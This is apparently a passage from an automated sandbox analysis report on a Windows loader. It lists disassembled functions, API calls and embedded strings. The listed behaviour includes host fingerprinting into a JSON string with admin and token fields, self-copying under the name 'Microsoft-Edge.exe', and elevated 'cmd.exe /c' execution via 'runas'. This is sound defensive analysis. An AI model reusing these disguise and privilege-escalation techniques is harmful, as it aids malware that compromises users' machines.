                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: $VUUU$invalid stoi argument
                                                                                                                                                                  • API String ID: 909987262-3954507777
                                                                                                                                                                  • Opcode ID: 6b838fbfe19d5931d0062d04980c7bbeafbf790f639d8fd7c4c08d9207d12690
                                                                                                                                                                  • Instruction ID: bd5e3fad9d4fd3bafc633f4f0d3d51968137c5826bfe0954a3832555989ac7bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b838fbfe19d5931d0062d04980c7bbeafbf790f639d8fd7c4c08d9207d12690
                                                                                                                                                                  • Instruction Fuzzy Hash: 6951D871644301BFE724EB64CC42F5B77E9AF84B04F401529F658AB2D0DB70A9088B9A
                                                                                                                                                                  Function 00C5C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                  • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                  • Instruction ID: cab9319188b549ec97c662bb2829f2ca913731e5c92d5087b69a196612546936
                                                                                                                                                                  • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                  • Instruction Fuzzy Hash: EEB1373A9003459FDB11CF28C8C1BAEBBF5EF55341F1481AAEC559B341D6349E89CB68

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:25.9%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:19.3%
                                                                                                                                                                  Total number of Nodes:280
                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                  execution_graph 1106 402ec0 1107 402ed2 1106->1107 1109 402ee2 1107->1109 1111 403bb0 1107->1111 1110 402f27 1112 403c50 1111->1112 1113 403bbe 1111->1113 1115 403c70 InitializeCriticalSection 1112->1115 1116 403c5a 1112->1116 1114 403bf0 1113->1114 1119 403bc0 1113->1119 1117 403bfe 1114->1117 1120 403a20 4 API calls 1114->1120 1115->1116 1116->1110 1118 403bd9 1117->1118 1121 403c15 free 1117->1121 1122 403c26 DeleteCriticalSection 1117->1122 1118->1110 1119->1118 1124 403a20 EnterCriticalSection 1119->1124 1120->1117 1121->1121 1121->1122 1122->1118 1125 403a74 LeaveCriticalSection 1124->1125 1127 403a41 1124->1127 1126 403a50 TlsGetValue GetLastError 1126->1127 1127->1125 1127->1126 1137 403b10 1138 403b30 EnterCriticalSection 1137->1138 1139 403b21 1137->1139 1140 403b63 LeaveCriticalSection 1138->1140 1141 403b49 1138->1141 1142 403b70 1140->1142 1141->1140 1143 403b4f free LeaveCriticalSection 1141->1143 1143->1142 1145 403a90 1146 403ab4 1145->1146 1147 403aa9 1145->1147 1146->1147 1148 403acb EnterCriticalSection LeaveCriticalSection 1146->1148 1149 404210 1150 404490 _vsnprintf 1149->1150 1152 402e90 1153 402e99 1152->1153 1154 402e9d 1153->1154 1155 403bb0 7 API calls 1153->1155 1156 402eb5 1155->1156 1157 401010 1159 401058 1157->1159 1158 40106b __set_app_type 1160 401075 1158->1160 1159->1158 1159->1160 1161 401096 1160->1161 1164 402fa0 1160->1164 1165 404188 __setusermatherr 1164->1165 1166 402d90 RtlCaptureContext RtlLookupFunctionEntry 1167 402dca RtlVirtualUnwind 1166->1167 1168 402e6d 1166->1168 1169 402e03 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 1167->1169 1168->1169 1169->1168 1173 4014e0 1174 402cb0 5 API calls 1173->1174 1175 4014f6 1174->1175 1176 401180 88 API calls 1175->1176 1177 4014fb 1176->1177 1181 401aed 1182 401afa 1181->1182 1183 401b14 1182->1183 1184 401afe puts exit 1182->1184 1189 4018bf 1183->1189 1184->1183 1187 401b22 puts exit 1188 401b38 1187->1188 1191 401958 strstr 1189->1191 1192 401aa0 strstr 1191->1192 1193 401a83 printf 1191->1193 1195 401ad2 puts 1192->1195 1196 401ab8 printf 1192->1196 1194 401ae3 1193->1194 1194->1187 1194->1188 1195->1194 1196->1194 897 4014b0 902 402cb0 897->902 899 4014c6 906 401180 899->906 901 4014cb 903 402cf0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 902->903 904 402cd9 902->904 905 402d4b 903->905 904->899 905->899 907 401470 GetStartupInfoA 906->907 908 4011b4 906->908 924 4013f0 907->924 909 4011dc Sleep 908->909 910 4011f1 908->910 909->908 911 401224 910->911 912 40143c _initterm 910->912 910->924 926 4032e0 911->926 912->911 914 40124c SetUnhandledExceptionFilter 956 403740 914->956 916 401315 malloc 917 401387 916->917 918 40133c 916->918 962 4029e7 917->962 920 401350 strlen malloc memcpy 918->920 919 401268 919->916 920->920 921 401382 920->921 921->917 924->901 925 4013e5 _cexit 925->924 927 403313 926->927 949 403302 926->949 928 403380 927->928 932 403453 927->932 927->949 931 403389 928->931 928->949 929 40357a 935 403610 929->935 936 4035ad 929->936 934 4033d7 931->934 985 4030e0 931->985 932->929 933 40349a 932->933 932->934 932->949 933->932 941 4030e0 11 API calls 933->941 945 4030e0 11 API calls 933->945 944 403402 VirtualProtect 934->944 934->949 937 4036d0 935->937 938 40361b 935->938 939 4035b4 936->939 940 40362f signal 936->940 948 403641 937->948 950 4036e6 signal 937->950 942 403654 938->942 946 40361d 938->946 939->942 939->948 951 4035c5 939->951 943 4036b0 signal 940->943 940->948 941->933 947 403662 signal 942->947 942->948 943->948 944->934 945->932 946->940 946->948 952 403700 signal 947->952 955 4035f1 947->955 948->914 949->914 950->955 951->948 953 4035db signal 951->953 952->955 954 403720 signal 953->954 953->955 954->955 955->914 958 40374f 956->958 957 40377c 957->919 958->957 1014 403d20 958->1014 960 403777 960->957 961 403810 RtlAddFunctionTable 960->961 961->957 963 4029fc 962->963 964 402a29 963->964 965 402a1b puts 963->965 966 402a35 setlocale 964->966 965->966 967 402a4b fwrite 966->967 970 402a7d 966->970 969 4013c7 967->969 969->924 969->925 971 402aa2 puts 970->971 972 402ab3 970->972 971->972 1019 401b3f 972->1019 975 402ac3 printf 975->969 976 402add 1026 401c4b 976->1026 979 402aee strlen 1056 402559 979->1056 981 402b38 SleepEx 982 402ae2 981->982 982->981 1048 402218 GetSystemInfo GlobalMemoryStatusEx 982->1048 1061 402760 982->1061 984 402b29 free 984->981 986 403102 985->986 991 4031b2 985->991 987 40316c VirtualQuery 986->987 986->991 992 4032ac 986->992 988 40319a 987->988 987->992 989 403234 VirtualProtect 988->989 988->991 990 403264 GetLastError 989->990 989->991 990->991 991->931 993 40357a 992->993 998 403380 992->998 1008 403302 992->1008 994 403610 993->994 995 4035ad 993->995 996 4036d0 994->996 997 40361b 994->997 999 4035b4 995->999 1000 40362f signal 995->1000 1003 403641 996->1003 1009 4036e6 signal 996->1009 1001 40361d 997->1001 1005 403654 997->1005 1004 403402 VirtualProtect 998->1004 998->1008 999->1003 999->1005 1006 4035c5 999->1006 1002 4036b0 signal 1000->1002 1000->1003 1001->1000 1001->1003 1002->1003 1003->931 1004->998 1005->1003 1007 403662 signal 1005->1007 1006->1003 1011 4035db signal 1006->1011 1010 403700 signal 1007->1010 1013 4035f1 1007->1013 1008->931 1009->1013 1010->1013 1012 403720 signal 1011->1012 1011->1013 1012->1013 1013->931 1016 403d2f 1014->1016 1015 403da0 1015->960 1016->1015 1017 403d7e strncmp 1016->1017 1017->1016 1018 403d93 1017->1018 1018->960 1020 401b70 1019->1020 1021 401b96 fwrite 1020->1021 1025 401bc5 1020->1025 1024 401c42 1021->1024 1023 401c29 CloseHandle 1023->1024 1024->975 1024->976 1025->1023 1027 401c79 1026->1027 1028 401caa 1027->1028 1029 401c7d fwrite 1027->1029 1032 401cf0 PathAppendA CopyFileA 1028->1032 1033 401cc3 fwrite 1028->1033 1031 401e57 1029->1031 1031->982 1034 401d55 1032->1034 1035 401d28 fwrite 1032->1035 1033->1031 1038 401d68 CreateFileA 1034->1038 1035->1031 1039 401db7 GetFileAttributesA 1038->1039 1040 401e6c fwrite 1038->1040 1041 401dd6 SetFileAttributesA 1039->1041 1042 401e2f fwrite 1039->1042 1040->1031 1043 401e05 fwrite 1041->1043 1044 401df7 puts 1041->1044 1042->1031 1043->1031 1044->1031 1067 401fde RegOpenKeyExA 1048->1067 1050 4022a8 GetComputerNameA RegOpenKeyExA 1051 402358 RegQueryValueExA 1050->1051 1052 4023a9 RegOpenKeyExA 1050->1052 1051->1052 1053 402415 RegQueryValueExA 1052->1053 1054 402463 1052->1054 1053->1054 1055 4024a0 sprintf printf 1054->1055 1055->979 1057 402591 1056->1057 1058 402595 1057->1058 1059 40259c malloc 1057->1059 1058->982 1060 4025b4 1059->1060 1060->1058 1064 40279c 1061->1064 1062 4029b0 1062->984 1063 402905 malloc 1063->1064 1064->1062 1064->1063 1065 402993 free 1064->1065 1083 402700 1064->1083 1065->1064 1068 40205b RegQueryValueExA 1067->1068 1073 4021f4 1067->1073 1069 4020b2 RegQueryValueExA 1068->1069 1070 40209b strncpy 1068->1070 1071 4020f2 printf 1069->1071 1072 402105 RegCloseKey atoi strstr 1069->1072 1070->1069 1071->1072 1074 402139 1072->1074 1075 40215e 1072->1075 1073->1050 1074->1075 1076 402142 strncpy 1074->1076 1077 402183 strstr 1075->1077 1078 402167 strncpy 1075->1078 1076->1073 1079 402198 strstr 1077->1079 1080 4021ad strncpy 1077->1080 1078->1073 1079->1080 1081 4021c6 strstr 1079->1081 1080->1073 1081->1073 1082 4021db strncpy 1081->1082 1082->1073 1091 402607 1083->1091 1086 402727 puts 1098 401e9e 1086->1098 1087 40274d puts 1089 402759 1087->1089 1089->1065 1092 402629 1091->1092 1093 40261e 1091->1093 1092->1086 1092->1087 1093->1092 1094 40267a malloc 1093->1094 1095 402692 1094->1095 1096 402699 1094->1096 1095->1092 1096->1095 1097 4026d7 free 1096->1097 1097->1092 1099 401f20 1098->1099 1100 401f24 puts 1099->1100 1101 401f35 ShellExecuteExA 1099->1101 1105 401fa8 free 1100->1105 1102 401f61 1101->1102 1101->1105 1103 401f8a printf 1102->1103 1104 401f7c puts 1102->1104 1103->1105 1104->1105 1105->1089 1200 4041f0 1203 4042b0 1200->1203 1205 404220 GetModuleHandleW GetProcAddress 1203->1205 1205->1203 1206 403830 1207 403851 1206->1207 1208 4038db signal 1207->1208 1212 403898 1207->1212 1214 4038f6 1207->1214 1215 403882 signal 1207->1215 1210 4039d0 signal 1208->1210 1208->1212 1209 403980 signal 1211 403996 signal 1209->1211 1209->1212 1210->1214 1211->1214 1212->1208 1212->1209 1213 403937 signal 1212->1213 1212->1214 1213->1212 1216 403a00 signal 1213->1216 1215->1212 1217 4039e9 signal 1215->1217 1216->1214 1217->1214 1218 402fb0 1219 402fcf 1218->1219 1220 403006 fprintf 1219->1220 1221 401730 1222 401775 1221->1222 1223 401779 puts 1222->1223 1225 40178f 1222->1225 1224 40184c 1223->1224 1226 4017d5 printf 1225->1226 1231 4017ef 1225->1231 1226->1224 1228 401802 printf 1230 401e9e 4 API calls 1228->1230 1229 401826 printf 1229->1231 1230->1231 1231->1228 1231->1229 1232 401677 CreateToolhelp32Snapshot Process32First 1231->1232 1233 4016cc 1232->1233 1234 4016eb 1232->1234 1233->1234 1235 4016f7 Process32Next 1233->1235 1234->1231 1235->1233 1235->1234

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00402F40 1 Function_00403740 27 Function_00403EE0 1->27 37 Function_00403E70 1->37 62 Function_00403D20 1->62 2 Function_00402EC0 72 Function_00403BB0 2->72 3 Function_00402BC0 4 Function_004042C0 5 Function_004030C0 6 Function_00403FC0 54 Function_00403C90 6->54 7 Function_00415AC3 8 Function_00415A42 9 Function_00401C4B 10 Function_0041594A 11 Function_00401550 12 Function_00402F50 13 Function_00403050 76 Function_004041B0 13->76 14 Function_004042D0 15 Function_004030D0 16 Function_00403CD0 17 Function_004041D0 18 Function_00415950 19 Function_004159D2 20 Function_00401855 21 Function_00402559 22 Function_0041595D 23 Function_00401FDE 24 Function_00415ADF 25 Function_00403060 25->76 26 Function_00402760 44 Function_00402700 26->44 27->54 28 Function_004030E0 28->27 28->28 36 Function_00404070 28->36 68 Function_00403E30 28->68 69 Function_004030B0 28->69 70 Function_00403DB0 28->70 74 Function_004044B0 28->74 29 Function_004032E0 29->28 29->36 29->68 29->69 29->74 30 Function_004041E0 31 Function_004014E0 45 Function_00401180 31->45 67 Function_00402CB0 31->67 32 Function_00414060 33 Function_00402FE1 33->76 34 Function_004029E7 34->9 34->11 34->21 34->26 38 Function_00402C70 34->38 49 Function_0040160A 34->49 59 Function_00402218 34->59 82 Function_00401B3F 34->82 35 Function_00401AED 60 Function_0040189A 35->60 83 Function_004018BF 35->83 37->54 39 Function_00403070 39->76 40 Function_004041F0 75 Function_004042B0 40->75 41 Function_00401677 42 Function_00415AFC 43 Function_00403080 43->76 47 Function_00402607 44->47 61 Function_00401E9E 44->61 45->1 45->4 45->29 45->30 45->34 45->38 45->69 46 Function_00414000 48 Function_00415A06 50 Function_00402E90 50->72 51 Function_00401010 51->14 65 Function_00402FA0 51->65 66 Function_00402CA0 51->66 52 Function_00401510 53 Function_00403B10 55 Function_00402D90 56 Function_00403090 56->76 57 Function_00403A90 58 Function_00404210 59->11 59->23 60->20 62->54 63 Function_00403A20 64 Function_00403F20 64->54 68->54 70->54 71 Function_00403830 71->69 72->63 72->69 73 Function_00402FB0 73->76 74->76 77 Function_004014B0 77->45 77->67 78 Function_00401130 79 Function_00401730 79->41 79->61 80 Function_00401530 81 Function_00403CB2

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00402218 Relevance: 47.4, APIs: 9, Strings: 18, Instructions: 154registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemInfo.KERNEL32 ref: 00402241
                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0040225E
                                                                                                                                                                    • Part of subcall function 00401FDE: RegOpenKeyExA.KERNEL32 ref: 00402051
                                                                                                                                                                    • Part of subcall function 00401FDE: RegQueryValueExA.KERNEL32 ref: 00402095
                                                                                                                                                                    • Part of subcall function 00401FDE: strncpy.MSVCRT ref: 004020AD
                                                                                                                                                                    • Part of subcall function 00401FDE: RegQueryValueExA.KERNEL32 ref: 004020EC
                                                                                                                                                                    • Part of subcall function 00401FDE: printf.MSVCRT ref: 00402100
                                                                                                                                                                    • Part of subcall function 00401FDE: RegCloseKey.KERNEL32 ref: 00402113
                                                                                                                                                                    • Part of subcall function 00401FDE: atoi.MSVCRT ref: 0040211C
                                                                                                                                                                    • Part of subcall function 00401FDE: strstr.MSVCRT ref: 0040212F
                                                                                                                                                                    • Part of subcall function 00401FDE: strncpy.MSVCRT ref: 00402154
                                                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 004022CA
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32 ref: 00402352
                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00402394
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32 ref: 0040240F
                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 0040244E
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402536
                                                                                                                                                                  • printf.MSVCRT ref: 00402549
                                                                                                                                                                  Strings
                                                                                                                                                                  • true, xrefs: 0040246C
                                                                                                                                                                  • SystemProductName, xrefs: 0040243D
                                                                                                                                                                  • Windows, xrefs: 00402516
                                                                                                                                                                  • Processo, xrefs: 004022D6
                                                                                                                                                                  • x64, xrefs: 00402490
                                                                                                                                                                  • Microsoft-Edge.exe, xrefs: 004024CC
                                                                                                                                                                  • Model, xrefs: 004023B3
                                                                                                                                                                  • Unknown , xrefs: 00402260
                                                                                                                                                                  • { "cpuCores": "%u", "totalMemory": "%llu MB", "platform": "%s", "arch": "%s", "model": "%s", "osVersion": "%s", "processorName": "%s", "systemModel": "%s", "configuration": "%s", "filename": "%s", "admin": "%s", "token": "%s"}, xrefs: 00402528
                                                                                                                                                                  • Unknown , xrefs: 004023A9
                                                                                                                                                                  • false, xrefs: 00402475
                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040233D
                                                                                                                                                                  • ProcessorNameString, xrefs: 00402383
                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\BIOS, xrefs: 004023FA
                                                                                                                                                                  • 5879465914, xrefs: 004024B4
                                                                                                                                                                  • System Info JSON:%s, xrefs: 00402542
                                                                                                                                                                  • x86, xrefs: 00402499
                                                                                                                                                                  • Unknown , xrefs: 004022CC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$Open$printfstrncpy$CloseComputerGlobalInfoMemoryNameStatusSystematoisprintfstrstr
                                                                                                                                                                  • String ID: 5879465914$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Microsoft-Edge.exe$Model$Processo$ProcessorNameString$System Info JSON:%s$SystemProductName$Unknown $Unknown $Unknown $Windows$false$true$x64$x86${ "cpuCores": "%u", "totalMemory": "%llu MB", "platform": "%s", "arch": "%s", "model": "%s", "osVersion": "%s", "processorName": "%s", "systemModel": "%s", "configuration": "%s", "filename": "%s", "admin": "%s", "token": "%s"}
                                                                                                                                                                  • API String ID: 4029298962-3802587010
                                                                                                                                                                  • Opcode ID: da8525ef243d30c2edf7e48c7b0dd2ac65d971a58a557c0755b9c302740e70be
                                                                                                                                                                  • Instruction ID: 7bbad046644aba7b8c0eebd7a0f359c977efbb6d67af6d4d89ac9c8c1b5c799d
                                                                                                                                                                  • Opcode Fuzzy Hash: da8525ef243d30c2edf7e48c7b0dd2ac65d971a58a557c0755b9c302740e70be
                                                                                                                                                                  • Instruction Fuzzy Hash: AF71ECB2210B8599DB74CF16E8903D933A5F748788F80812ADB9D5BB68EF79C354C748
                                                                                                                                                                  Function 00401180 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189sleepstringCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 93 401180-4011ae 94 401470-401473 GetStartupInfoA 93->94 95 4011b4-4011d1 93->95 99 401480-401499 call 404170 94->99 96 4011e4-4011ef 95->96 97 4011f1-4011ff 96->97 98 4011d3-4011d6 96->98 102 401205-401209 97->102 103 401427-401436 call 404180 97->103 100 401410-401421 98->100 101 4011dc-4011e1 Sleep 98->101 113 40149e-4014a6 call 404140 99->113 100->102 100->103 101->96 102->99 106 40120f-40121e 102->106 109 401224-401226 103->109 110 40143c-401457 _initterm 103->110 106->109 106->110 111 40122c-401239 109->111 112 40145d-401462 109->112 110->111 110->112 115 401247-401294 call 4032e0 SetUnhandledExceptionFilter call 403740 call 4041e0 call 4030b0 call 4042c0 111->115 116 40123b-401243 111->116 112->111 128 4012b2-4012b8 115->128 129 401296 115->129 116->115 131 4012a0-4012a2 128->131 132 4012ba-4012c8 128->132 130 4012f7-4012fd 129->130 133 401315-40133a malloc 130->133 134 4012ff-401309 130->134 135 4012d0-4012d2 131->135 136 4012a4-4012a7 131->136 137 4012ae 132->137 140 401387-4013c2 call 402c70 call 4029e7 133->140 141 40133c-401349 133->141 138 401400-401405 134->138 139 40130f 134->139 143 4012d4 135->143 144 4012e5-4012ee 135->144 136->135 142 4012a9 136->142 137->128 138->139 139->133 152 4013c7-4013d5 140->152 147 401350-401380 strlen malloc memcpy 141->147 142->137 145 4012f0 143->145 144->145 146 4012e0-4012e3 144->146 145->130 146->144 146->145 147->147 149 401382 147->149 149->140 152->113 153 4013db-4013e3 152->153 154 4013f0-4013ff 153->154 155 4013e5-4013ea _cexit 153->155 155->154
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled_cexitmemcpystrlen
                                                                                                                                                                  • String ID: h@
                                                                                                                                                                  • API String ID: 1640792405-485769165
                                                                                                                                                                  • Opcode ID: 39f3e5cf561da997b405f95571c56a3e99b1e2c7bc00c2501b2981bd38061aa7
                                                                                                                                                                  • Instruction ID: 4c29a552a55374966fbeb6cd99cb9045177b543220c5f115e7a68cb18e85450b
                                                                                                                                                                  • Opcode Fuzzy Hash: 39f3e5cf561da997b405f95571c56a3e99b1e2c7bc00c2501b2981bd38061aa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C7188B570075486EB20AF66E89076A33A1B789B88F44803BDF09B77A1DF3DD854C349
                                                                                                                                                                  Function 00401E9E Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 156 401e9e-401f22 158 401f24-401f30 puts 156->158 159 401f35-401f5f ShellExecuteExA 156->159 160 401fd4-401fdd 158->160 161 401f61-401f7a 159->161 162 401fa8-401fd3 159->162 165 401f8a-401fa6 printf 161->165 166 401f7c-401f88 puts 161->166 162->160 165->160 166->160
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • runas, xrefs: 00401EE1
                                                                                                                                                                  • cmd.exe, xrefs: 00401EEF
                                                                                                                                                                  • /c %s, xrefs: 00401F08
                                                                                                                                                                  • Error: Failed to execute command %s with elevated privileges. Error code: %ld, xrefs: 00401F9A
                                                                                                                                                                  • Error: The user refused to allow privileges elevation., xrefs: 00401F7C
                                                                                                                                                                  • Error: Cannot format command line., xrefs: 00401F24
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: puts$ExecuteShell
                                                                                                                                                                  • String ID: /c %s$Error: Cannot format command line.$Error: Failed to execute command %s with elevated privileges. Error code: %ld$Error: The user refused to allow privileges elevation.$cmd.exe$runas
                                                                                                                                                                  • API String ID: 961791793-699271044
                                                                                                                                                                  • Opcode ID: 825dd6dfc1f2c07fb3755769cee10684da71ff619e358bb8e36eeac6c73bb857
                                                                                                                                                                  • Instruction ID: 8cf10ecf543ab77f8754b7e41b8cf71e1f194f8d7f35ca4a7169013fc0aa2929
                                                                                                                                                                  • Opcode Fuzzy Hash: 825dd6dfc1f2c07fb3755769cee10684da71ff619e358bb8e36eeac6c73bb857
                                                                                                                                                                  • Instruction Fuzzy Hash: 34311671310B858AEB61DF26EC443D833A8F788788F800126DB4D6BBA8EF38C645C745
                                                                                                                                                                  Function 00401B3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
